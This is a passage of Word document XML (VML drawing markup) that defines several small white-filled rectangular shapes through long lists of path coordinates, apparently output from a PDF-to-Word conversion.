2800,6022,2800,6021,2800,6019,2800,6018,2800,6017,2800,6015,2800,6014,2800,6012,2800,6011,2800,6009,2800,6008,2800,6006,2800,6004,2800,6002,2800,6000,2800,5999,2800,5996,2800,5994,2800,5992,2800,5990,2800,5988,2800,5986,2800,5983,2800,5981,2800,5978,2800,5976,2800,5973,2800,5970,2800,5967,2800,5965,2800,5962,2800,5959,2800,5955,2800,5952,2800,5949,2800,5946,2800,5942,2800,5939,2800,5935,2800,5932,2800,5928,2800,5924,2800,5920,2800,5916,2800,5912,2800,5908,2800,5904,2800,5900,2800,5895,2800,5891,2800,5886,2800,5881,2800,5877,2800,5872,2800,5867,2800,5862,2800,5857,2800,5851,2800,5846,2800,5841,2800,5835,2800,5829,2800,5824,2800,5818,2800,5812,2800,5806,2800,5800,2800,5793,2800,5787e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:6390;width:130;height:270" coordorigin="2790,6390" coordsize="130,270" path="m2800,6417l2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2801,6417,2802,6417,2802,6417,2802,6417,2802,6417,2802,6417,2802,6417,2803,6417,2803,6417,2803,6417,2803,6417,2803,6417,2804,6417,2804,6417,2804,6417,2805,6417,2805,6417,2805,6417,2806,6417,2806,6417,2806,6417,2807,6417,2807,6417,2808,6417,2808,6417,2809,6417,2809,6417,2810,6417,2810,6417,2811,6417,2812,6417,2812,6417,2813,6417,2814,6417,2814,6417,2815,6417,2816,6417,2817,6417,2817,6417,2818,6417,2819,6417,2820,6417,2821,6417,2822,6417,2823,6417,2824,6417,2825,6417,2826,6417,2827,6417,2828,6417,2829,6417,2830,6417,2832,6417,2833,6417,2834,6417,2836,6417,2837,6417,2838,6417,2840,6417,2841,6417,2843,6417,2844,6417,2846,6417,2847,6417,2849,6417,2851,6417,2852,6417,2854,6417,2856,6417,2858,6417,2860,6417,2861,6417,2863,6417,2865,6417,2867,6417,2870,6417,2872,6417,2874,6417,2876,6417,2878,6417,2881,6417,2883,6417,2885,6417,2888,6417,2890,6417,2893,6417,2895,6417,2898,6417,2901,6417,2903,6417,2906,6417,2909,6417,2912,6417,2915,6417,2917,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6417,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6418,2920,6419,2920,6419,2920,6419,2920,6419,2920,6420,2920,6420,2920,6420,2920,6421,2920,6421,2920,6421,2920,6422,2920,6422,2920,6423,2920,6423,2920,6424,2920,6424,2920,6425,2920,6426,2920,6426,2920,6427,2920,6428,2920,6428,2920,6429,2920,6430,2920,6431,2920,6432,2920,6433,2920,6434,2920,6435,2920,6436,2920,6437,2920,6439,2920,6440,2920,6441,2920,6442,2920,6444,2920,6445,2920,6447,2920,6448,2920,6450,2920,6452,2920,6453,2920,6455,2920,6457,2920,6459,2920,6461,2920,6463,2920,6465,2920,6467,2920,6469,2920,6471,2920,6474,2920,6476,2920,6479,2920,6481,2920,6484,2920,6486,2920,6489,2920,6492,2920,6495,2920,6498,2920,6501,2920,6504,2920,6507,2920,6510,2920,6514,2920,6517,2920,6520,2920,6524,2920,6528,2920,6531,2920,6535,2920,6539,2920,6543,2920,6547,2920,6551,2920,6555,2920,6560,2920,6564,2920,6569,2920,6573,2920,6578,2920,6583,2920,6588,2920,6592,2920,6598,2920,6603,2920,6608,2920,6613,2920,6619,2920,6624,2920,6630,2920,6636,2920,6642,2920,6647,2920,6654,2920,6660,2920,6666,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2920,6672,2919,6672,2919,6672,2919,6672,2919,6672,2919,6672,2919,6672,2919,6672,2918,6672,2918,6672,2918,6672,2918,6672,2917,6672,2917,6672,2917,6672,2917,6672,2916,6672,2916,6672,2916,6672,2915,6672,2915,6672,2914,6672,2914,6672,2914,6672,2913,6672,2913,6672,2912,6672,2912,6672,2911,6672,2910,6672,2910,6672,2909,6672,2909,6672,2908,6672,2907,6672,2907,6672,2906,6672,2905,6672,2904,6672,2903,6672,2903,6672,2902,6672,2901,6672,2900,6672,2899,6672,2898,6672,2897,6672,2896,6672,2895,6672,2894,6672,2893,6672,2892,6672,2890,6672,2889,6672,2888,6672,2887,6672,2885,6672,2884,6672,2883,6672,2881,6672,2880,6672,2878,6672,2877,6672,2875,6672,2874,6672,2872,6672,2870,6672,2869,6672,2867,6672,2865,6672,2863,6672,2861,6672,2859,6672,2857,6672,2855,6672,2853,6672,2851,6672,2849,6672,2847,6672,2845,6672,2843,6672,2840,6672,2838,6672,2836,6672,2833,6672,2831,6672,2828,6672,2826,6672,2823,6672,2820,6672,2818,6672,2815,6672,2812,6672,2809,6672,2806,6672,2803,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6671,2800,6671,2800,6671,2800,6671,2800,6671,2800,6671,2800,6670,2800,6670,2800,6670,2800,6669,2800,6669,2800,6669,2800,6668,2800,6668,2800,6667,2800,6667,2800,6666,2800,6666,2800,6665,2800,6665,2800,6664,2800,6663,2800,6663,2800,6662,2800,6661,2800,6660,2800,6659,2800,6659,2800,6658,2800,6657,2800,6656,2800,6655,2800,6653,2800,6652,2800,6651,2800,6650,2800,6649,2800,6647,2800,6646,2800,6644,2800,6643,2800,6641,2800,6640,2800,6638,2800,6636,2800,6634,2800,6633,2800,6631,2800,6629,2800,6627,2800,6625,2800,6623,2800,6620,2800,6618,2800,6616,2800,6613,2800,6611,2800,6608,2800,6606,2800,6603,2800,6601,2800,6598,2800,6595,2800,6592,2800,6589,2800,6586,2800,6583,2800,6579,2800,6576,2800,6573,2800,6569,2800,6566,2800,6562,2800,6558,2800,6554,2800,6551,2800,6547,2800,6543,2800,6538,2800,6534,2800,6530,2800,6525,2800,6521,2800,6516,2800,6512,2800,6507,2800,6502,2800,6497,2800,6492,2800,6487,2800,6482,2800,6476,2800,6471,2800,6465,2800,6460,2800,6454,2800,6448,2800,6442,2800,6436,2800,6430,2800,6424,2800,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:2790;top:7050;width:130;height:250" coordorigin="2790,7050" coordsize="130,250" path="m2800,7063l2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2801,7063,2802,7063,2802,7063,2802,7063,2802,7063,2802,7063,2802,7063,2803,7063,2803,7063,2803,7063,2803,7063,2803,7063,2804,7063,2804,7063,2804,7063,2805,7063,2805,7063,2805,7063,2806,7063,2806,7063,2806,7063,2807,7063,2807,7063,2808,7063,2808,7063,2809,7063,2809,7063,2810,7063,2810,7063,2811,7063,2812,7063,2812,7063,2813,7063,2814,7063,2814,7063,2815,7063,2816,7063,2817,7063,2817,7063,2818,7063,2819,7063,2820,7063,2821,7063,2822,7063,2823,7063,2824,7063,2825,7063,2826,7063,2827,7063,2828,7063,2829,7063,2830,7063,2832,7063,2833,7063,2834,7063,2836,7063,2837,7063,2838,7063,2840,7063,2841,7063,2843,7063,2844,7063,2846,7063,2847,7063,2849,7063,2851,7063,2852,7063,2854,7063,2856,7063,2858,7063,2860,7063,2861,7063,2863,7063,2865,7063,2867,7063,2870,7063,2872,7063,2874,7063,2876,7063,2878,7063,2881,7063,2883,7063,2885,7063,2888,7063,2890,7063,2893,7063,2895,7063,2898,7063,2901,7063,2903,7063,2906,7063,2909,7063,2912,7063,2915,7063,2917,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7063,2920,7064,2920,7064,2920,7064,2920,7064,2920,7064,2920,7065,2920,7065,2920,7065,2920,7066,2920,7066,2920,7066,2920,7067,2920,7067,2920,7068,2920,7068,2920,7068,2920,7069,2920,7070,2920,7070,2920,7071,2920,7072,2920,7072,2920,7073,2920,7074,2920,7075,2920,7075,2920,7076,2920,7077,2920,7078,2920,7079,2920,7080,2920,7081,2920,7083,2920,7084,2920,7085,2920,7086,2920,7088,2920,7089,2920,7091,2920,7092,2920,7094,2920,7095,2920,7097,2920,7099,2920,7100,2920,7102,2920,7104,2920,7106,2920,7108,2920,7110,2920,7112,2920,7114,2920,7117,2920,7119,2920,7121,2920,7124,2920,7126,2920,7129,2920,7132,2920,7134,2920,7137,2920,7140,2920,7143,2920,7146,2920,7149,2920,7152,2920,7156,2920,7159,2920,7162,2920,7166,2920,7169,2920,7173,2920,7177,2920,7180,2920,7184,2920,7188,2920,7192,2920,7196,2920,7201,2920,7205,2920,7209,2920,7214,2920,7219,2920,7223,2920,7228,2920,7233,2920,7238,2920,7243,2920,7248,2920,7253,2920,7259,2920,7264,2920,7270,2920,7275,2920,7281,2920,7287,2920,7293,2920,7299,2920,7305,2920,7311,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2920,7318,2919,7318,2919,7318,2919,7318,2919,7318,2919,7318,2919,7318,2919,7318,2918,7318,2918,7318,2918,7318,2918,7318,2917,7318,2917,7318,2917,7318,2917,7318,2916,7318,2916,7318,2916,7318,2915,7318,2915,7318,2914,7318,2914,7318,2914,7318,2913,7318,2913,7318,2912,7318,2912,7318,2911,7318,2910,7318,2910,7318,2909,7318,2909,7318,2908,7318,2907,7318,2907,7318,2906,7318,2905,7318,2904,7318,2903,7318,2903,7318,2902,7318,2901,7318,2900,7318,2899,7318,2898,7318,2897,7318,2896,7318,2895,7318,2894,7318,2893,7318,2892,7318,2890,7318,2889,7318,2888,7318,2887,7318,2885,7318,2884,7318,2883,7318,2881,7318,2880,7318,2878,7318,2877,7318,2875,7318,2874,7318,2872,7318,2870,7318,2869,7318,2867,7318,2865,7318,2863,7318,2861,7318,2859,7318,2857,7318,2855,7318,2853,7318,2851,7318,2849,7318,2847,7318,2845,7318,2843,7318,2840,7318,2838,7318,2836,7318,2833,7318,2831,7318,2828,7318,2826,7318,2823,7318,2820,7318,2818,7318,2815,7318,2812,7318,2809,7318,2806,7318,2803,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7317,2800,7316,2800,7316,2800,7316,2800,7316,2800,7316,2800,7315,2800,7315,2800,7315,2800,7314,2800,7314,2800,7314,2800,7313,2800,7313,2800,7312,2800,7312,2800,7311,2800,7311,2800,7310,2800,7309,2800,7309,2800,7308,2800,7307,2800,7306,2800,7306,2800,7305,2800,7304,2800,7303,2800,7302,2800,7301,2800,7300,2800,7299,2800,7298,2800,7296,2800,7295,2800,7294,2800,7292,2800,7291,2800,7290,2800,7288,2800,7287,2800,7285,2800,7283,2800,7282,2800,7280,2800,7278,2800,7276,2800,7274,2800,7272,2800,7270,2800,7268,2800,7266,2800,7263,2800,7261,2800,7259,2800,7256,2800,7254,2800,7251,2800,7249,2800,7246,2800,7243,2800,7240,2800,7237,2800,7234,2800,7231,2800,7228,2800,7225,2800,7221,2800,7218,2800,7215,2800,7211,2800,7207,2800,7204,2800,7200,2800,7196,2800,7192,2800,7188,2800,7184,2800,7180,2800,7175,2800,7171,2800,7166,2800,7162,2800,7157,2800,7152,2800,7147,2800,7142,2800,7137,2800,7132,2800,7127,2800,7122,2800,7116,2800,7111,2800,7105,2800,7099,2800,7093,2800,7087,2800,7081,2800,7075,2800,7069,2800,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:383.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,7670" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:7670;width:130;height:270" coordorigin="2790,7670" coordsize="130,270" path="m2800,7693l2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2801,7693,2802,7693,2802,7693,2802,7693,2802,7693,2802,7693,2802,7693,2803,7693,2803,7693,2803,7693,2803,7693,2803,7693,2804,7693,2804,7693,2804,7693,2805,7693,2805,7693,2805,7693,2806,7693,2806,7693,2806,7693,2807,7693,2807,7693,2808,7693,2808,7693,2809,7693,2809,7693,2810,7693,2810,7693,2811,7693,2812,7693,2812,7693,2813,7693,2814,7693,2814,7693,2815,7693,2816,7693,2817,7693,2817,7693,2818,7693,2819,7693,2820,7693,2821,7693,2822,7693,2823,7693,2824,7693,2825,7693,2826,7693,2827,7693,2828,7693,2829,7693,2830,7693,2832,7693,2833,7693,2834,7693,2836,7693,2837,7693,2838,7693,2840,7693,2841,7693,2843,7693,2844,7693,2846,7693,2847,7693,2849,7693,2851,7693,2852,7693,2854,7693,2856,7693,2858,7693,2860,7693,2861,7693,2863,7693,2865,7693,2867,7693,2870,7693,2872,7693,2874,7693,2876,7693,2878,7693,2881,7693,2883,7693,2885,7693,2888,7693,2890,7693,2893,7693,2895,7693,2898,7693,2901,7693,2903,7693,2906,7693,2909,7693,2912,7693,2915,7693,2917,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7693,2920,7694,2920,7694,2920,7694,2920,7694,2920,7694,2920,7694,2920,7695,2920,7695,2920,7695,2920,7696,2920,7696,2920,7696,2920,7697,2920,7697,2920,7697,2920,7698,2920,7698,2920,7699,2920,7699,2920,7700,2920,7701,2920,7701,2920,7702,2920,7703,2920,7703,2920,7704,2920,7705,2920,7706,2920,7707,2920,7708,2920,7709,2920,7710,2920,7711,2920,7712,2920,7713,2920,7714,2920,7715,2920,7717,2920,7718,2920,7719,2920,7721,2920,7722,2920,7724,2920,7726,2920,7727,2920,7729,2920,7731,2920,7733,2920,7734,2920,7736,2920,7738,2920,7740,2920,7743,2920,7745,2920,7747,2920,7749,2920,7752,2920,7754,2920,7757,2920,7759,2920,7762,2920,7765,2920,7768,2920,7770,2920,7773,2920,7776,2920,7779,2920,7783,2920,7786,2920,7789,2920,7793,2920,7796,2920,7800,2920,7803,2920,7807,2920,7811,2920,7815,2920,7819,2920,7823,2920,7827,2920,7831,2920,7835,2920,7840,2920,7844,2920,7849,2920,7854,2920,7858,2920,7863,2920,7868,2920,7873,2920,7878,2920,7884,2920,7889,2920,7894,2920,7900,2920,7906,2920,7911,2920,7917,2920,7923,2920,7929,2920,7935,2920,7942,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2920,7948,2919,7948,2919,7948,2919,7948,2919,7948,2919,7948,2919,7948,2919,7948,2918,7948,2918,7948,2918,7948,2918,7948,2917,7948,2917,7948,2917,7948,2917,7948,2916,7948,2916,7948,2916,7948,2915,7948,2915,7948,2914,7948,2914,7948,2914,7948,2913,7948,2913,7948,2912,7948,2912,7948,2911,7948,2910,7948,2910,7948,2909,7948,2909,7948,2908,7948,2907,7948,2907,7948,2906,7948,2905,7948,2904,7948,2903,7948,2903,7948,2902,7948,2901,7948,2900,7948,2899,7948,2898,7948,2897,7948,2896,7948,2895,7948,2894,7948,2893,7948,2892,7948,2890,7948,2889,7948,2888,7948,2887,7948,2885,7948,2884,7948,2883,7948,2881,7948,2880,7948,2878,7948,2877,7948,2875,7948,2874,7948,2872,7948,2870,7948,2869,7948,2867,7948,2865,7948,2863,7948,2861,7948,2859,7948,2857,7948,2855,7948,2853,7948,2851,7948,2849,7948,2847,7948,2845,7948,2843,7948,2840,7948,2838,7948,2836,7948,2833,7948,2831,7948,2828,7948,2826,7948,2823,7948,2820,7948,2818,7948,2815,7948,2812,7948,2809,7948,2806,7948,2803,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7947,2800,7947,2800,7947,2800,7947,2800,7947,2800,7947,2800,7947,2800,7946,2800,7946,2800,7946,2800,7946,2800,7945,2800,7945,2800,7945,2800,7944,2800,7944,2800,7943,2800,7943,2800,7943,2800,7942,2800,7942,2800,7941,2800,7940,2800,7940,2800,7939,2800,7938,2800,7938,2800,7937,2800,7936,2800,7935,2800,7934,2800,7933,2800,7932,2800,7931,2800,7930,2800,7929,2800,7928,2800,7927,2800,7925,2800,7924,2800,7923,2800,7921,2800,7920,2800,7918,2800,7917,2800,7915,2800,7914,2800,7912,2800,7910,2800,7908,2800,7906,2800,7904,2800,7902,2800,7900,2800,7898,2800,7896,2800,7894,2800,7891,2800,7889,2800,7887,2800,7884,2800,7882,2800,7879,2800,7876,2800,7873,2800,7870,2800,7868,2800,7865,2800,7861,2800,7858,2800,7855,2800,7852,2800,7848,2800,7845,2800,7841,2800,7838,2800,7834,2800,7830,2800,7826,2800,7822,2800,7818,2800,7814,2800,7810,2800,7806,2800,7801,2800,7797,2800,7792,2800,7787,2800,7783,2800,7778,2800,7773,2800,7768,2800,7763,2800,7757,2800,7752,2800,7746,2800,7741,2800,7735,2800,7730,2800,7724,2800,7718,2800,7712,2800,7706,2800,7699,2800,7693e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:415.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,8310" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:8310;width:130;height:270" coordorigin="2790,8310" coordsize="130,270" path="m2800,8338l2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2801,8338,2802,8338,2802,8338,2802,8338,2802,8338,2802,8338,2802,8338,2803,8338,2803,8338,2803,8338,2803,8338,2803,8338,2804,8338,2804,8338,2804,8338,2805,8338,2805,8338,2805,8338,2806,8338,2806,8338,2806,8338,2807,8338,2807,8338,2808,8338,2808,8338,2809,8338,2809,8338,2810,8338,2810,8338,2811,8338,2812,8338,2812,8338,2813,8338,2814,8338,2814,8338,2815,8338,2816,8338,2817,8338,2817,8338,2818,8338,2819,8338,2820,8338,2821,8338,2822,8338,2823,8338,2824,8338,2825,8338,2826,8338,2827,8338,2828,8338,2829,8338,2830,8338,2832,8338,2833,8338,2834,8338,2836,8338,2837,8338,2838,8338,2840,8338,2841,8338,2843,8338,2844,8338,2846,8338,2847,8338,2849,8338,2851,8338,2852,8338,2854,8338,2856,8338,2858,8338,2860,8338,2861,8338,2863,8338,2865,8338,2867,8338,2870,8338,2872,8338,2874,8338,2876,8338,2878,8338,2881,8338,2883,8338,2885,8338,2888,8338,2890,8338,2893,8338,2895,8338,2898,8338,2901,8338,2903,8338,2906,8338,2909,8338,2912,8338,2915,8338,2917,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8338,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8339,2920,8340,2920,8340,2920,8340,2920,8340,2920,8341,2920,8341,2920,8341,2920,8342,2920,8342,2920,8342,2920,8343,2920,8343,2920,8344,2920,8344,2920,8345,2920,8345,2920,8346,2920,8346,2920,8347,2920,8348,2920,8349,2920,8349,2920,8350,2920,8351,2920,8352,2920,8353,2920,8354,2920,8355,2920,8356,2920,8357,2920,8358,2920,8359,2920,8361,2920,8362,2920,8363,2920,8365,2920,8366,2920,8368,2920,8369,2920,8371,2920,8373,2920,8374,2920,8376,2920,8378,2920,8380,2920,8382,2920,8384,2920,8386,2920,8388,2920,8390,2920,8392,2920,8395,2920,8397,2920,8400,2920,8402,2920,8405,2920,8407,2920,8410,2920,8413,2920,8416,2920,8419,2920,8422,2920,8425,2920,8428,2920,8431,2920,8434,2920,8438,2920,8441,2920,8445,2920,8449,2920,8452,2920,8456,2920,8460,2920,8464,2920,8468,2920,8472,2920,8476,2920,8481,2920,8485,2920,8490,2920,8494,2920,8499,2920,8504,2920,8508,2920,8513,2920,8519,2920,8524,2920,8529,2920,8534,2920,8540,2920,8545,2920,8551,2920,8557,2920,8562,2920,8568,2920,8575,2920,8581,2920,8587,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2920,8593,2919,8593,2919,8593,2919,8593,2919,8593,2919,8593,2919,8593,2919,8593,2918,8593,2918,8593,2918,8593,2918,8593,2917,8593,2917,8593,2917,8593,2917,8593,2916,8593,2916,8593,2916,8593,2915,8593,2915,8593,2914,8593,2914,8593,2914,8593,2913,8593,2913,8593,2912,8593,2912,8593,2911,8593,2910,8593,2910,8593,2909,8593,2909,8593,2908,8593,2907,8593,2907,8593,2906,8593,2905,8593,2904,8593,2903,8593,2903,8593,2902,8593,2901,8593,2900,8593,2899,8593,2898,8593,2897,8593,2896,8593,2895,8593,2894,8593,2893,8593,2892,8593,2890,8593,2889,8593,2888,8593,2887,8593,2885,8593,2884,8593,2883,8593,2881,8593,2880,8593,2878,8593,2877,8593,2875,8593,2874,8593,2872,8593,2870,8593,2869,8593,2867,8593,2865,8593,2863,8593,2861,8593,2859,8593,2857,8593,2855,8593,2853,8593,2851,8593,2849,8593,2847,8593,2845,8593,2843,8593,2840,8593,2838,8593,2836,8593,2833,8593,2831,8593,2828,8593,2826,8593,2823,8593,2820,8593,2818,8593,2815,8593,2812,8593,2809,8593,2806,8593,2803,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8592,2800,8592,2800,8592,2800,8592,2800,8592,2800,8591,2800,8591,2800,8591,2800,8591,2800,8590,2800,8590,2800,8590,2800,8589,2800,8589,2800,8588,2800,8588,2800,8587,2800,8587,2800,8586,2800,8586,2800,8585,2800,8584,2800,8584,2800,8583,2800,8582,2800,8581,2800,8580,2800,8580,2800,8579,2800,8578,2800,8577,2800,8576,2800,8574,2800,8573,2800,8572,2800,8571,2800,8569,2800,8568,2800,8567,2800,8565,2800,8564,2800,8562,2800,8561,2800,8559,2800,8557,2800,8555,2800,8554,2800,8552,2800,8550,2800,8548,2800,8546,2800,8544,2800,8541,2800,8539,2800,8537,2800,8534,2800,8532,2800,8529,2800,8527,2800,8524,2800,8521,2800,8519,2800,8516,2800,8513,2800,8510,2800,8507,2800,8504,2800,8500,2800,8497,2800,8494,2800,8490,2800,8487,2800,8483,2800,8479,2800,8475,2800,8472,2800,8468,2800,8464,2800,8459,2800,8455,2800,8451,2800,8446,2800,8442,2800,8437,2800,8433,2800,8428,2800,8423,2800,8418,2800,8413,2800,8408,2800,8403,2800,8397,2800,8392,2800,8386,2800,8381,2800,8375,2800,8369,2800,8363,2800,8357,2800,8351,2800,8345,2800,8338e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:447.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,8950" coordsize="130,270">
        <v:shape style="position:absolute;left:2790;top:8950;width:130;height:270" coordorigin="2790,8950" coordsize="130,270" path="m2800,8969l2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2801,8969,2802,8969,2802,8969,2802,8969,2802,8969,2802,8969,2802,8969,2803,8969,2803,8969,2803,8969,2803,8969,2803,8969,2804,8969,2804,8969,2804,8969,2805,8969,2805,8969,2805,8969,2806,8969,2806,8969,2806,8969,2807,8969,2807,8969,2808,8969,2808,8969,2809,8969,2809,8969,2810,8969,2810,8969,2811,8969,2812,8969,2812,8969,2813,8969,2814,8969,2814,8969,2815,8969,2816,8969,2817,8969,2817,8969,2818,8969,2819,8969,2820,8969,2821,8969,2822,8969,2823,8969,2824,8969,2825,8969,2826,8969,2827,8969,2828,8969,2829,8969,2830,8969,2832,8969,2833,8969,2834,8969,2836,8969,2837,8969,2838,8969,2840,8969,2841,8969,2843,8969,2844,8969,2846,8969,2847,8969,2849,8969,2851,8969,2852,8969,2854,8969,2856,8969,2858,8969,2860,8969,2861,8969,2863,8969,2865,8969,2867,8969,2870,8969,2872,8969,2874,8969,2876,8969,2878,8969,2881,8969,2883,8969,2885,8969,2888,8969,2890,8969,2893,8969,2895,8969,2898,8969,2901,8969,2903,8969,2906,8969,2909,8969,2912,8969,2915,8969,2917,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8969,2920,8970,2920,8970,2920,8970,2920,8970,2920,8970,2920,8971,2920,8971,2920,8971,2920,8971,2920,8972,2920,8972,2920,8973,2920,8973,2920,8973,2920,8974,2920,8974,2920,8975,2920,8976,2920,8976,2920,8977,2920,8977,2920,8978,2920,8979,2920,8980,2920,8981,2920,8981,2920,8982,2920,8983,2920,8984,2920,8985,2920,8986,2920,8987,2920,8989,2920,8990,2920,8991,2920,8992,2920,8994,2920,8995,2920,8997,2920,8998,2920,9000,2920,9001,2920,9003,2920,9005,2920,9006,2920,9008,2920,9010,2920,9012,2920,9014,2920,9016,2920,9018,2920,9020,2920,9023,2920,9025,2920,9027,2920,9030,2920,9032,2920,9035,2920,9038,2920,9040,2920,9043,2920,9046,2920,9049,2920,9052,2920,9055,2920,9058,2920,9061,2920,9065,2920,9068,2920,9072,2920,9075,2920,9079,2920,9083,2920,9086,2920,9090,2920,9094,2920,9098,2920,9102,2920,9107,2920,9111,2920,9115,2920,9120,2920,9124,2920,9129,2920,9134,2920,9139,2920,9144,2920,9149,2920,9154,2920,9159,2920,9165,2920,9170,2920,9176,2920,9181,2920,9187,2920,9193,2920,9199,2920,9205,2920,9211,2920,9217,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2920,9224,2919,9224,2919,9224,2919,9224,2919,9224,2919,9224,2919,9224,2919,9224,2918,9224,2918,9224,2918,9224,2918,9224,2917,9224,2917,9224,2917,9224,2917,9224,2916,9224,2916,9224,2916,9224,2915,9224,2915,9224,2914,9224,2914,9224,2914,9224,2913,9224,2913,9224,2912,9224,2912,9224,2911,9224,2910,9224,2910,9224,2909,9224,2909,9224,2908,9224,2907,9224,2907,9224,2906,9224,2905,9224,2904,9224,2903,9224,2903,9224,2902,9224,2901,9224,2900,9224,2899,9224,2898,9224,2897,9224,2896,9224,2895,9224,2894,9